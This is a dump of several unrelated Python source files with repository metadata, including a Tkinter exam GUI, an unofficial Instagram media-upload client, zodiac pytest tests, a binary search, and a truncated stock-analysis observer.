('network', models.CharField(max_length=45)),
('release_date', models.DateField()),
('description', models.TextField()),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
],
),
]
| [
"alitahir6001@gmail.com"
] | alitahir6001@gmail.com |
a3cf0ec1a60c0488d760b56a6bbf60c6b1bb6c07 | 91863aa943df50cdcf3b8965239eb4c8b5688e0b | /examenrecuperacion.py | 9efd342ed6ad4d564b4836fe578083a85cae9c34 | [] | no_license | Danemora23/ExamenRecuperacion | dc2428b675bf72da600b6c06ac7b5fc02e7736e9 | 3bc3478b670b174156183176a4201e3471efe25f | refs/heads/master | 2020-06-08T13:40:22.580022 | 2019-06-22T16:40:30 | 2019-06-22T16:40:30 | 193,237,135 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,424 | py | #Logica de sistemas
#primer semestre
#Darwin Daneri Morales López
#0907-19-11615
from tkinter import ttk
from tkinter import *
class Desk:
def __init__(self, window):
#ancho
ancho = 400
#alto
alto = 250
# asignamos la ventana a una variable de la clase llamada wind
self.wind = window
#le asignamos el ancho y el alto a la ventana con la propiedad geometry
self.wind.geometry(str(ancho)+'x'+str(alto))
#centramos el contenido
self.wind.columnconfigure(0, weight=1)
#le damos un titulo a la ventana
self.wind.title('EXAMEN RECUPERACION')
# creamos un contenedor
frame = LabelFrame(self.wind, text = 'EXAMEN RECUPERACION')
frame.grid(row = 0, column = 0, columnspan = 3, pady = 20)
# creamos un etiqueta
Label(frame, text = '1er Numero: ').grid(row = 1, column = 0)
#creamos un input donde ingresar valores
self.var1 = Entry(frame)
self.var1.focus()
self.var1.grid(row = 1, column = 1)
# igual que arriba una etiqueta y un campo input para ingresar valores
Label(frame, text = '2do Numero: ').grid(row = 2, column = 0)
self.var2 = Entry(frame)
self.var2.focus()
self.var2.grid(row = 2, column = 1)
# igual que arriba una etiqueta y un campo input para ingresar valores
Label(frame, text = '3er Numero: ').grid(row = 3, column = 0)
self.var3 = Entry(frame)
self.var3.focus()
self.var3.grid(row = 3, column = 1)
#Creamos un boton 1
Button(frame, text = 'Boton 1', command = self.sumar).grid(row = 5, columnspan =2, sticky = W + E)
#Creamos un boton 2
Button(frame, text = 'Boton 2', command = self.resta).grid(row = 6, columnspan =2, sticky = W + E)
#designamos un área de mensajes
self.message = Label(text = '', fg = 'red')
self.message.grid(row = 3, column = 0, columnspan = 2, sticky = W + E)
# creamos una función para validar que los campos no esten en blanco
def validation(self):
return len(self.var1.get()) != 0 and len(self.var2.get()) != 0 and len(self.var3.get()) != 0
# esta es la función primer boton
def sumar(self):
if self.validation():
resultado = float( self.var1.get() ) * float( self.var2.get() ) * float( self.var3.get() )
self.message['text'] = 'multiplicación de los 3 campos:{}'.format(resultado)
else:
self.message['text'] = 'los campos requeridos'
# esta es la función segundo boton
def resta(self):
if self.validation():
resultado = float( self.var1.get() ) > float( self.var2.get() )
self.message['text'] = 'CONCATENAR:{}'.format(resultado)
else:
self.message['text'] = 'los campos requeridos'
#validamos si estamos en la aplicación inicial
if __name__ == '__main__':
#asignamos la propiedad de tkinter a la variable window
window = Tk()
#en la variable app guardamos la clase Desk y le enviamos como parametro la ventana
app = Desk(window)
#ejecutamos un mainloop para que se ejecute la ventana
window.mainloop() | [
"noreply@github.com"
] | noreply@github.com |
93a8bc8d49919f8877dea6d420bb5f3010c25371 | 43625b3ef2c599920d0b5044c49537ed90cfada2 | /instagram_private_api/endpoints/upload.py | c35272273dc868573fadbf14388efcb1d269baab | [
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
] | permissive | comtong/instagram_graw_fans | adc5225e8a3339b96327673758db08dce6375dd0 | 2b9ecdf957acecab1adb222664f8cea5cbb42889 | refs/heads/master | 2021-01-06T20:40:37.980950 | 2017-09-18T12:49:50 | 2017-09-18T12:49:50 | 99,544,073 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 31,727 | py | import json
import time
from random import randint
import re
import warnings
from ..compat import compat_urllib_error, compat_urllib_request
from ..errors import ClientError
from ..http import MultipartFormDataEncoder
from ..utils import (
max_chunk_count_generator, max_chunk_size_generator,
get_file_size
)
from ..compatpatch import ClientCompatPatch
from .common import ClientDeprecationWarning
from .common import MediaTypes
class MediaRatios(object):
"""
Class holding valid aspect ratios (width: height) for media uploads.
"""
# Based on IG sampling
# and from https://help.instagram.com/1469029763400082
#: Acceptable min, max values of with/height ratios for a standard media upload
standard = 4.0 / 5.0, 90.0 / 47.0
__device_ratios = [(3, 4), (2, 3), (5, 8), (3, 5), (9, 16), (10, 16), (40, 71)]
__aspect_ratios = [1.0 * x[0] / x[1] for x in __device_ratios]
#: Acceptable min, max values of with/height ratios for a story upload
reel = min(__aspect_ratios), max(__aspect_ratios)
class UploadEndpointsMixin(object):
"""For endpoints relating to upload functionality."""
EXTERNAL_LOC_SOURCES = {
'foursquare': 'foursquare_v2_id',
'facebook_places': 'facebook_places_id',
'facebook_events': 'facebook_events_id'
}
def _validate_location(self, location):
"""
Validates and patches a location dict for use with the upload functions
:param location: dict containing location info
:return:
"""
location_keys = ['external_source', 'name', 'address']
if not isinstance(location, dict):
raise ValueError('Location must be a dict.')
# patch location object returned from location_search
if 'external_source' not in location and 'external_id_source' in location and 'external_id' in location:
external_source = location['external_id_source']
location['external_source'] = external_source
if external_source in self.EXTERNAL_LOC_SOURCES:
location[self.EXTERNAL_LOC_SOURCES[external_source]] = location['external_id']
for k in location_keys:
if not location.get(k):
raise ValueError('Location dict must contain "{0!s}".'.format(k))
for k, val in self.EXTERNAL_LOC_SOURCES.items():
if location['external_source'] == k and not location.get(val):
raise ValueError('Location dict must contain "{0!s}".'.format(val))
media_loc = {
'name': location['name'],
'address': location['lat'],
'external_source': location['external_source'],
}
if 'lat' in location and 'lng' in location:
media_loc['lat'] = location['lat']
media_loc['lng'] = location['lng']
for k, val in self.EXTERNAL_LOC_SOURCES.items():
if location['external_source'] == k:
media_loc['external_source'] = k
media_loc[val] = location[val]
return media_loc
@staticmethod
def standard_ratios(): # pragma: no cover
"""
Deprecated. Use MediaRatios.standard instead.
Acceptable min, max values of with/height ratios for a standard media upload
:return: tuple of (min. ratio, max. ratio)
"""
warnings.warn(
'Client.standard_ratios() is deprecated. '
'Please use MediaRatios.standard instead.',
ClientDeprecationWarning
)
return MediaRatios.standard
@staticmethod
def reel_ratios(): # pragma: no cover
"""
Deprecated. Use MediaRatios.reel instead.
Acceptable min, max values of with/height ratios for a story upload
:return: tuple of (min. ratio, max. ratio)
"""
warnings.warn(
'Client.reel_ratios() is deprecated. '
'Please use MediaRatios.reel instead.',
ClientDeprecationWarning
)
return MediaRatios.reel
@classmethod
def compatible_aspect_ratio(cls, size):
"""
Helper method to check aspect ratio for standard uploads
:param size: tuple of (width, height)
:return: True/False
"""
min_ratio, max_ratio = MediaRatios.standard
width, height = size
this_ratio = 1.0 * width / height
return min_ratio <= this_ratio <= max_ratio
@classmethod
def reel_compatible_aspect_ratio(cls, size):
"""
Helper method to check aspect ratio for story uploads
:param size: tuple of (width, height)
:return: True/False
"""
min_ratio, max_ratio = MediaRatios.reel
width, height = size
this_ratio = 1.0 * width / height
return min_ratio <= this_ratio <= max_ratio
def configure(self, upload_id, size, caption='', location=None,
disable_comments=False, is_sidecar=False):
"""
Finalises a photo upload. This should not be called directly.
Use :meth:`post_photo` instead.
:param upload_id:
:param size: tuple of (width, height)
:param caption:
:param location: a dict of venue/location information,
from :meth:`location_search` or :meth:`location_fb_search`
:param disable_comments:
:param is_sidecar: bool flag for album upload
:return:
"""
if not self.compatible_aspect_ratio(size):
raise ValueError('Incompatible aspect ratio.')
endpoint = 'media/configure/'
width, height = size
params = {
'caption': caption,
'media_folder': 'Instagram',
'source_type': '4',
'upload_id': upload_id,
'device': {
'manufacturer': self.phone_manufacturer,
'model': self.phone_device,
'android_version': self.android_version,
'android_release': self.android_release
},
'edits': {
'crop_original_size': [width * 1.0, height * 1.0],
'crop_center': [0.0, -0.0],
'crop_zoom': 1.0
},
'extra': {
'source_width': width,
'source_height': height,
}
}
if location:
media_loc = self._validate_location(location)
params['location'] = json.dumps(media_loc)
if 'lat' in location and 'lng' in location:
params['geotag_enabled'] = '1'
params['exif_latitude'] = '0.0'
params['exif_longitude'] = '0.0'
params['posting_latitude'] = str(location['lat'])
params['posting_longitude'] = str(location['lng'])
params['media_latitude'] = str(location['lat'])
params['media_latitude'] = str(location['lng'])
if disable_comments:
params['disable_comments'] = '1'
if is_sidecar:
return params
params.update(self.authenticated_params)
res = self._call_api(endpoint, params=params)
if self.auto_patch and res.get('media'):
ClientCompatPatch.media(res.get('media'), drop_incompat_keys=self.drop_incompat_keys)
return res
def configure_video(self, upload_id, size, duration, thumbnail_data, caption='',
location=None, disable_comments=False, is_sidecar=False):
"""
Finalises a video upload. This should not be called directly.
Use :meth:`post_video` instead.
:param upload_id:
:param size: tuple of (width, height)
:param duration: in seconds
:param thumbnail_data: byte string of thumbnail photo
:param caption:
:param location: a dict of venue/location information,
from :meth:`location_search` or :meth:`location_fb_search`
:param disable_comments:
:param is_sidecar: bool flag for album upload
:return:
"""
if not self.compatible_aspect_ratio(size):
raise ValueError('Incompatible aspect ratio.')
# upload video thumbnail
self.post_photo(thumbnail_data, size, caption, upload_id, location=location,
disable_comments=disable_comments, is_sidecar=is_sidecar)
width, height = size
params = {
'upload_id': upload_id,
'caption': caption,
'source_type': '3',
'poster_frame_index': 0,
'length': duration * 1.0,
'audio_muted': False,
'filter_type': '0',
'video_result': 'deprecated',
'clips': {
'length': duration * 1.0,
'source_type': '3',
'camera_position': 'back'
},
'device': {
'manufacturer': self.phone_manufacturer,
'model': self.phone_device,
'android_version': self.android_version,
'android_release': self.android_release
},
'extra': {
'source_width': width,
'source_height': height
}
}
if disable_comments:
params['disable_comments'] = '1'
if location:
media_loc = self._validate_location(location)
params['location'] = json.dumps(media_loc)
if 'lat' in location and 'lng' in location:
params['geotag_enabled'] = '1'
params['av_latitude'] = '0.0'
params['av_longitude'] = '0.0'
params['posting_latitude'] = str(location['lat'])
params['posting_longitude'] = str(location['lng'])
params['media_latitude'] = str(location['lat'])
params['media_latitude'] = str(location['lng'])
if is_sidecar:
return params
params.update(self.authenticated_params)
res = self._call_api('media/configure/', params=params, query={'video': 1})
if res.get('media') and self.auto_patch:
ClientCompatPatch.media(res.get('media'), drop_incompat_keys=self.drop_incompat_keys)
return res
def configure_to_reel(self, upload_id, size):
"""
Finalises a photo story upload. This should not be called directly.
Use :meth:`post_photo_story` instead.
:param upload_id:
:param size: tuple of (width, height)
:return:
"""
if not self.reel_compatible_aspect_ratio(size):
raise ValueError('Incompatible aspect ratio.')
endpoint = 'media/configure_to_story/'
width, height = size
params = {
'source_type': '4',
'upload_id': upload_id,
'story_media_creation_date': str(int(time.time()) - randint(11, 20)),
'client_shared_at': str(int(time.time()) - randint(3, 10)),
'client_timestamp': str(int(time.time())),
'configure_mode': 1, # 1 - REEL_SHARE, 2 - DIRECT_STORY_SHARE
'device': {
'manufacturer': self.phone_manufacturer,
'model': self.phone_device,
'android_version': self.android_version,
'android_release': self.android_release
},
'edits': {
'crop_original_size': [width * 1.0, height * 1.0],
'crop_center': [0.0, 0.0],
'crop_zoom': 1.3333334
},
'extra': {
'source_width': width,
'source_height': height,
}
}
params.update(self.authenticated_params)
res = self._call_api(endpoint, params=params)
if self.auto_patch and res.get('media'):
ClientCompatPatch.media(res.get('media'), drop_incompat_keys=self.drop_incompat_keys)
return res
def configure_video_to_reel(self, upload_id, size, duration, thumbnail_data):
"""
Finalises a video story upload. This should not be called directly.
Use :meth:`post_video_story` instead.
:param upload_id:
:param size: tuple of (width, height)
:param duration: in seconds
:param thumbnail_data: byte string of thumbnail photo
:return:
"""
if not self.reel_compatible_aspect_ratio(size):
raise ValueError('Incompatible aspect ratio.')
res = self.post_photo(thumbnail_data, size, '', upload_id=upload_id, to_reel=True)
width, height = size
params = {
'source_type': '4',
'upload_id': upload_id,
'story_media_creation_date': str(int(time.time()) - randint(11, 20)),
'client_shared_at': str(int(time.time()) - randint(3, 10)),
'client_timestamp': str(int(time.time())),
'configure_mode': 1, # 1 - REEL_SHARE, 2 - DIRECT_STORY_SHARE
'poster_frame_index': 0,
'length': duration * 1.0,
'audio_muted': False,
'filter_type': '0',
'video_result': 'deprecated',
'clips': {
'length': duration * 1.0,
'source_type': '4',
'camera_position': 'back'
},
'device': {
'manufacturer': self.phone_manufacturer,
'model': self.phone_device,
'android_version': self.android_version,
'android_release': self.android_release
},
'extra': {
'source_width': width,
'source_height': height,
},
}
params.update(self.authenticated_params)
res = self._call_api('media/configure_to_story/', params=params, query={'video': '1'})
if self.auto_patch and res.get('media'):
ClientCompatPatch.media(res.get('media'), drop_incompat_keys=self.drop_incompat_keys)
return res
def post_photo(self, photo_data, size, caption='', upload_id=None, to_reel=False, **kwargs):
"""
Upload a photo.
[CAUTION] FLAKY, IG is very finicky about sizes, etc, needs testing.
:param photo_data: byte string of the image
:param size: tuple of (width, height)
:param caption:
:param upload_id:
:param to_reel: a Story photo
:param kwargs:
- **location**: a dict of venue/location information, from :meth:`location_search`
or :meth:`location_fb_search`
- **disable_comments**: bool to disable comments
:return:
"""
warnings.warn('This endpoint has not been fully tested.', UserWarning)
# if upload_id is provided, it's a thumbnail for a vid upload
for_video = True if upload_id else False
if not for_video:
if not to_reel and not self.compatible_aspect_ratio(size):
raise ValueError('Incompatible aspect ratio.')
if to_reel and not self.reel_compatible_aspect_ratio(size):
raise ValueError('Incompatible reel aspect ratio.')
if not 320 <= size[0] <= 1080:
# range from https://help.instagram.com/1631821640426723
raise ValueError('Invalid image width.')
location = kwargs.pop('location', None)
if location:
self._validate_location(location)
disable_comments = True if kwargs.pop('disable_comments', False) else False
is_sidecar = kwargs.pop('is_sidecar', False)
if not upload_id:
upload_id = str(int(time.time() * 1000))
endpoint = 'upload/photo/'
fields = [
('upload_id', upload_id),
('_uuid', self.uuid),
('_csrftoken', self.csrftoken),
('image_compression', '{"lib_name":"jt","lib_version":"1.3.0","quality":"87"}')
]
if is_sidecar:
fields.append(('is_sidecar', '1'))
if for_video:
fields.append(('media_type', MediaTypes.VIDEO))
files = [
('photo', 'pending_media_{0!s}{1!s}'.format(str(int(time.time() * 1000)), '.jpg'),
'application/octet-stream', photo_data)
]
content_type, body = MultipartFormDataEncoder().encode(fields, files)
headers = self.default_headers
headers['Content-Type'] = content_type
headers['Content-Length'] = len(body)
endpoint_url = '{0}{1}'.format(self.api_url.format(version='v1'), endpoint)
req = compat_urllib_request.Request(endpoint_url, body, headers=headers)
try:
self.logger.debug('POST {0!s}'.format(endpoint_url))
response = self.opener.open(req, timeout=self.timeout)
except compat_urllib_error.HTTPError as e:
error_msg = e.reason
error_response = self._read_response(e)
self.logger.debug('RESPONSE: {0:d} {1!s}'.format(e.code, error_response))
try:
error_obj = json.loads(error_response)
if error_obj.get('message'):
error_msg = '{0!s}: {1!s}'.format(e.reason, error_obj['message'])
except Exception as e:
# do nothing else, prob can't parse json
self.logger.warn('Error parsing error response: {}'.format(str(e)))
raise ClientError(error_msg, e.code, error_response)
post_response = self._read_response(response)
self.logger.debug('RESPONSE: {0:d} {1!s}'.format(response.code, post_response))
json_response = json.loads(post_response)
if for_video and is_sidecar:
return json_response
upload_id = json_response['upload_id']
# # NOTES: Logging traffic doesn't seem to indicate any additional "configure" after upload
# # BUT not doing a "configure" causes a video post to fail with a
# # "Other media configure error: b'yEmZkUpAj4'" error
# if for_video:
# logger.debug('Skip photo configure.')
# return json_response
if to_reel:
return self.configure_to_reel(upload_id, size)
else:
return self.configure(upload_id, size, caption=caption, location=location,
disable_comments=disable_comments, is_sidecar=is_sidecar)
def post_video(self, video_data, size, duration, thumbnail_data, caption='', to_reel=False, **kwargs):
"""
Upload a video
[CAUTION] FLAKY, IG is very picky about sizes, etc, needs testing.
:param video_data: byte string or a file-like object of the video content
:param size: tuple of (width, height)
:param duration: in seconds
:param thumbnail_data: byte string of the video thumbnail content
:param caption:
:param to_reel: post to reel as Story
:param kwargs:
- **location**: a dict of venue/location information, from :meth:`location_search`
or :meth:`location_fb_search`
- **disable_comments**: bool to disable comments
- **max_retry_count**: maximum attempts to reupload. Default 10.
:return:
"""
warnings.warn('This endpoint has not been fully tested.', UserWarning)
if not to_reel and not self.compatible_aspect_ratio(size):
raise ValueError('Incompatible aspect ratio.')
if to_reel and not self.reel_compatible_aspect_ratio(size):
raise ValueError('Incompatible reel aspect ratio.')
if not 612 <= size[0] <= 1080:
# range was determined through sampling of video uploads
raise ValueError('Invalid video width.')
if duration < 3.0:
raise ValueError('Duration is less than 3s.')
if not to_reel and duration > 60.0:
raise ValueError('Duration is more than 60s.')
if to_reel and duration > 15.0:
raise ValueError('Duration is more than 15s.')
max_file_len = 50 * 1024 * 1000
try:
video_file_len = len(video_data)
except TypeError:
video_file_len = get_file_size(video_data)
if video_file_len > max_file_len:
raise ValueError('Video file is too big.')
location = kwargs.pop('location', None)
if location:
self._validate_location(location)
disable_comments = True if kwargs.pop('disable_comments', False) else False
endpoint = 'upload/video/'
upload_id = str(int(time.time() * 1000))
width, height = size
params = {
'_csrftoken': self.csrftoken,
'_uuid': self.uuid,
'upload_id': upload_id,
}
is_sidecar = kwargs.pop('is_sidecar', False)
if is_sidecar:
params['is_sidecar'] = '1'
else:
params.update({
'media_type': MediaTypes.VIDEO,
'upload_media_duration_ms': int(duration * 1000),
'upload_media_width': width,
'upload_media_height': height
})
res = self._call_api(endpoint, params=params, unsigned=True)
upload_url = res['video_upload_urls'][-1]['url']
upload_job = res['video_upload_urls'][-1]['job']
successful_chunk_ranges = []
all_done = False
max_retry_count = kwargs.pop('max_retry_count', 10)
configure_delay = 0
for _ in range(max_retry_count + 1):
# Prevent excessively small chunks
if video_file_len > 1 * 1024 * 1000:
# max num of chunks = 4
chunk_generator = max_chunk_count_generator(4, video_data)
else:
# max chunk size = 350,000 so that we'll always have
# <4 chunks when it's <1mb
chunk_generator = max_chunk_size_generator(350000, video_data)
for chunk, data in chunk_generator:
skip_chunk = False
for received_chunk in successful_chunk_ranges:
if received_chunk[0] <= chunk.start and received_chunk[1] >= (chunk.end - 1):
skip_chunk = True
break
if skip_chunk:
self.logger.debug('Skipped chunk: {0:d} - {1:d}'.format(chunk.start, chunk.end - 1))
continue
headers = self.default_headers
headers['Connection'] = 'keep-alive'
headers['Content-Type'] = 'application/octet-stream'
headers['Content-Disposition'] = 'attachment; filename="video.mov"'
headers['Session-ID'] = upload_id
if is_sidecar:
headers['Cookie'] = 'sessionid=' + self.get_cookie_value('sessionid')
headers['job'] = upload_job
headers['Content-Length'] = chunk.length
headers['Content-Range'] = 'bytes {0:d}-{1:d}/{2:d}'.format(chunk.start, chunk.end - 1, video_file_len)
self.logger.debug('POST {0!s}'.format(upload_url))
self.logger.debug('Uploading Content-Range: {0!s}'.format(headers['Content-Range']))
req = compat_urllib_request.Request(
str(upload_url), data=data, headers=headers)
try:
res = self.opener.open(req, timeout=self.timeout)
post_response = self._read_response(res)
self.logger.debug('RESPONSE: {0:d} {1!s}'.format(res.code, post_response))
if res.info().get('Content-Type') == 'application/json':
# last chunk
upload_res = json.loads(post_response)
configure_delay = int(upload_res.get('configure_delay_ms', 0)) / 1000.0
all_done = True
break
else:
successful_chunk_ranges = []
post_progress = post_response.split(',')
for progress in post_progress:
mobj = re.match(r'(?P<start>[0-9]+)\-(?P<end>[0-9]+)/(?P<total>[0-9]+)', progress)
if mobj:
successful_chunk_ranges.append((int(mobj.group('start')), int(mobj.group('end'))))
else:
self.logger.error(
'Received unexpected chunk upload response: {0!s}'.format(post_response))
raise ClientError(
'Upload has failed due to unexpected upload response: {0!s}'.format(post_response),
code=500)
except compat_urllib_error.HTTPError as e:
error_msg = e.reason
error_response = self._read_response(e)
self.logger.debug('RESPONSE: {0:d} {1!s}'.format(e.code, error_response))
try:
error_obj = json.loads(error_response)
if error_obj.get('message'):
error_msg = '{0!s}: {1!s}'.format(e.reason, error_obj['message'])
except Exception as ex:
# do nothing else, prob can't parse json
self.logger.warn('Error parsing error response: {}'.format(str(ex)))
raise ClientError(error_msg, e.code, error_response)
else:
# if not break due to completed chunks then continue with next chunk
continue
break
if not all_done:
raise ClientError('Upload has failed due to incomplete chunk uploads.', code=500)
if not configure_delay:
configure_delay = 3
configure_retry_max = 2
for i in range(1, configure_retry_max + 1):
try:
if not to_reel:
result = self.configure_video(
upload_id, size, duration, thumbnail_data, caption=caption, location=location,
disable_comments=disable_comments, is_sidecar=is_sidecar)
else:
result = self.configure_video_to_reel(
upload_id, size, duration, thumbnail_data)
return result
except ClientError as ce:
if (ce.code == 202 or ce.msg == 'Transcode timeout') and i < configure_retry_max:
self.logger.warn('Retry configure after {0:f} seconds'.format(configure_delay))
time.sleep(configure_delay)
else:
raise
def post_photo_story(self, photo_data, size):
"""
Upload a photo story
:param photo_data: byte string of the image
:param size: tuple of (width, height)
:return:
"""
return self.post_photo(
photo_data=photo_data, size=size, to_reel=True)
def post_video_story(self, video_data, size, duration, thumbnail_data):
"""
Upload a video story
:param video_data: byte string or a file-like object of the video content
:param size: tuple of (width, height)
:param duration: in seconds
:param thumbnail_data: byte string of the video thumbnail content
:return:
"""
return self.post_video(
video_data=video_data, size=size, duration=duration,
thumbnail_data=thumbnail_data, to_reel=True)
def post_album(self, medias, caption='', location=None, **kwargs):
"""
Post an album of up to 10 photos/videos.
:param medias: an iterable list/collection of media dict objects
.. code-block:: javascript
medias = [
{"type": "image", "size": (720, 720), "data": "..."},
{
"type": "image", "size": (720, 720),
"usertags": [{"user_id":4292127751, "position":[0.625347,0.4384531]}],
"data": "..."
},
{"type": "video", "size": (720, 720), "duration": 12.4, "thumbnail": "...", "data": "..."}
]
:param caption:
:param location:
:return:
"""
album_upload_id = str(int(time.time() * 1000))
children_metadata = []
for media in medias:
if len(children_metadata) >= 10:
continue
if media.get('type', '') not in ['image', 'video']:
raise ValueError('Invalid media type: {0!s}'.format(media.get('type', '')))
if not media.get('data'):
raise ValueError('Data not specified.')
if not media.get('size'):
raise ValueError('Size not specified.')
if media['type'] == 'video':
if not media.get('duration'):
raise ValueError('Duration not specified.')
if not media.get('thumbnail'):
raise ValueError('Thumbnail not specified.')
aspect_ratio = (media['size'][0] * 1.0) / (media['size'][1] * 1.0)
if aspect_ratio > 1.0 or aspect_ratio < 1.0:
raise ValueError('Invalid media aspect ratio.')
if media['type'] == 'video':
metadata = self.post_video(
video_data=media['data'],
size=media['size'],
duration=media['duration'],
thumbnail_data=media['thumbnail'],
is_sidecar=True
)
else:
metadata = self.post_photo(
photo_data=media['data'],
size=media['size'],
is_sidecar=True,
)
if media.get('usertags'):
usertags = media['usertags']
utags = {'in': [{'user_id': str(u['user_id']), 'position': u['position']} for u in usertags]}
metadata['usertags'] = json.dumps(utags, separators=(',', ':'))
children_metadata.append(metadata)
if len(children_metadata) <= 1:
raise ValueError('Invalid number of media objects: {0:d}'.format(len(children_metadata)))
# configure as sidecar
endpoint = 'media/configure_sidecar/'
params = {
'caption': caption,
'client_sidecar_id': album_upload_id,
'children_metadata': children_metadata
}
if location:
media_loc = self._validate_location(location)
params['location'] = json.dumps(media_loc)
if 'lat' in location and 'lng' in location:
params['geotag_enabled'] = '1'
params['exif_latitude'] = '0.0'
params['exif_longitude'] = '0.0'
params['posting_latitude'] = str(location['lat'])
params['posting_longitude'] = str(location['lng'])
params['media_latitude'] = str(location['lat'])
params['media_latitude'] = str(location['lng'])
disable_comments = kwargs.pop('disable_comments', False)
if disable_comments:
params['disable_comments'] = '1'
params.update(self.authenticated_params)
res = self._call_api(endpoint, params=params)
if self.auto_patch and res.get('media'):
ClientCompatPatch.media(res.get('media'), drop_incompat_keys=self.drop_incompat_keys)
return res
| [
"com.tong@dingtone.me"
] | com.tong@dingtone.me |
cffecf521887b256704c2687151498010ff2288d | d1c9ff2dcc126d29f29ac0d47d48900b8413137e | /bite_242/test_zodiac.py | d779f465679abf977a6adcb16419e5249b747456 | [] | no_license | Accoustium/PyBites | d8aa2f7405ad33a0432340209b4a98e229058d16 | 4f57cc0243d4888edb3355c9517f53569ac37632 | refs/heads/master | 2020-09-20T09:31:45.088079 | 2020-07-17T20:59:28 | 2020-07-17T20:59:28 | 224,437,950 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,682 | py | from datetime import datetime
import json
import os
from pathlib import Path
from urllib.request import urlretrieve
import pytest
from zodiac import (get_signs, get_sign_with_most_famous_people,
signs_are_mutually_compatible, get_sign_by_date)
# original source: https://zodiacal.herokuapp.com/api
URL = "https://bites-data.s3.us-east-2.amazonaws.com/zodiac.json"
TMP = os.getenv("TMP", "/tmp")
PATH = Path(TMP, "zodiac.json")
@pytest.fixture(scope='module')
def signs():
if not PATH.exists():
urlretrieve(URL, PATH)
with open(PATH, encoding='utf-8') as f:
data = json.loads(f.read())
return get_signs(data)
def test_twelve_sings(signs):
assert len(signs) == 12
def test_get_list_of_signs(signs):
sign = str(type(signs[0]))
assert sign.split("'")[1] == 'zodiac.Sign'
def test_famous_signs(signs):
famous = get_sign_with_most_famous_people(signs)
assert famous == ('Scorpio', 35)
def test_sign_compatibility(signs):
assert signs_are_mutually_compatible(signs, 'Aries', 'Leo')
assert not signs_are_mutually_compatible(signs, 'Aries', 'Pisces')
assert signs_are_mutually_compatible(signs, 'Pisces', 'Taurus')
def test_months(signs):
taurus_date = datetime.fromisoformat('2020-05-05')
assert get_sign_by_date(signs, taurus_date) == "Taurus"
pisces_date = datetime.fromisoformat('2020-03-09')
assert get_sign_by_date(signs, pisces_date) == "Pisces"
aries_date = datetime.fromisoformat('2020-03-21')
assert get_sign_by_date(signs, aries_date) == "Aries"
aries_date = datetime.fromisoformat('2020-04-19')
assert get_sign_by_date(signs, aries_date) == "Aries"
| [
"tim.pogue@cybera.net"
] | tim.pogue@cybera.net |
874a69d989a964f5f0210a7eafbf994cd3c38d0c | 6ddcdda679089b228d55ef098addfe8193287d88 | /py/lpthw/test.py | 500c610d2d9010ee315cb403153222d93a1680c9 | [
"MIT"
] | permissive | danyfang/SourceCode | 518e4715a062ed1ad071dea023ff4785ce03b068 | 8168f6058648f2a330a7354daf3a73a4d8a4e730 | refs/heads/master | 2021-06-06T16:36:50.999324 | 2021-04-23T08:52:20 | 2021-04-23T08:52:20 | 120,310,634 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 547 | py | #!/usr/bin/python
from __future__ import division
#lambda function to calculate factor
x = int(raw_input("Please input an integer\n > "))
print reduce(lambda x,y: x*y, range(1,x+1))
def add(x,y):
return x+y
def sub(x,y):
return x-y
def mul(x,y):
return x*y
def div(x,y):
return x/y
operator = {"+":add, "-":sub, "*":mul, "/":div}
if __name__ == "__main__":
x = raw_input("Please input a numebr\n > ")
o = raw_input("Please input an operator\n > ")
y = raw_input("Please input a numebr\n > ")
print operator.get(o)(int(x), int(y))
| [
"danyfang7@gmail.com"
] | danyfang7@gmail.com |
184e76acc81ef96d91ecfc5efccadfcb8455eaea | 7f00f425e3ffe87716a010c7c2a13af8b8ebd790 | /search/binary_search_iterative.py | 6a6cc3550aff63c7843fcd16c65ccd314ed3ea43 | [] | no_license | barmansurajit/trees | 7601bdc3229356949551127184e95f6a23b0c30a | 75f03d44a7197ba0334104216925ade8b2c73c6d | refs/heads/master | 2023-03-07T06:33:29.610186 | 2021-02-17T02:34:21 | 2021-02-17T02:34:21 | 339,591,231 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 490 | py | def binary_search(arr, data):
n = len(arr)
l: int = 0
r = n - 1
while l <= r:
mid = int(l + (r - l) / 2)
if data == arr[mid]:
return mid
elif data > arr[mid]:
l = mid + 1
else:
r = mid - 1
return -1
array = [5, 9, 17, 23, 25, 45, 59, 63, 71, 89]
x = 8
location = binary_search(array, x)
if location != -1:
print(f"Element is present at index {location}")
else:
print(f"Element not found")
| [
"Surajit.Barman@cognizant.com"
] | Surajit.Barman@cognizant.com |
df505e9af0f2f820295ab64a09f370c98512ade5 | 20e8c4fe06e05873e212cfb31942208a10b7d502 | /source/observers/observer_pricefluctuation_multistock_dailyclose.py | 440a0b67831abc1a53305e0b68ef51f7d093021f | [] | no_license | abednego1979/tipster2 | adafd85e65904c957c8bf248790b4f781c0737b0 | 556d36e409be117230585fffa9a6ee40008ccd47 | refs/heads/master | 2019-07-11T22:39:34.699695 | 2018-07-10T10:17:29 | 2018-07-10T10:17:29 | 110,588,227 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 8,941 | py | #*- coding: utf-8 -*-
#Python 3.5.x
#utf8编码
import os
import sys
import logging
import json
import traceback
from .observer import Observer
import myGlobal
import config
import numpy as np
import pandas as pd
from concurrent.futures import ThreadPoolExecutor, wait
from BaseFunc import BaseFunc
from database.DB_Ex import MyDbEx
from info_output.Drawing import MyDrawing
#这个Observer利用价格浮动寻找价格低点
#对于多个股票,以其中一个为基准,计算个股票的相对波动。并自动找出当前处于相对低值的股票
#
class PriceFluctuation_MultiStock_DailyClose_Actor(MyDbEx, BaseFunc):
def __init__(self, stocks, meanLen, StockClass=''): #T:时间均线的时间长度,N:买卖点百分比阈值
self.stocks=stocks #股票列表
self.StockClass=StockClass #股票分类
self.meanLen=meanLen #参考均线
self.LoggerPrefixString='<%s><%s><mean:%d>' % (self.StockClass, json.dumps(self.stocks), self.meanLen)
self.result=[]
pass
def selfLogger(self, level, OutString):
try:
if level=='info':
myGlobal.logger.info(self.LoggerPrefixString+OutString)
elif level=='debug':
myGlobal.logger.debug(self.LoggerPrefixString+OutString)
elif level=='error':
myGlobal.logger.error(self.LoggerPrefixString+OutString)
except Exception as err:
print (err)
print(traceback.format_exc())
def newTicker(self):
#对self.stocks中所列举的股票进行计算
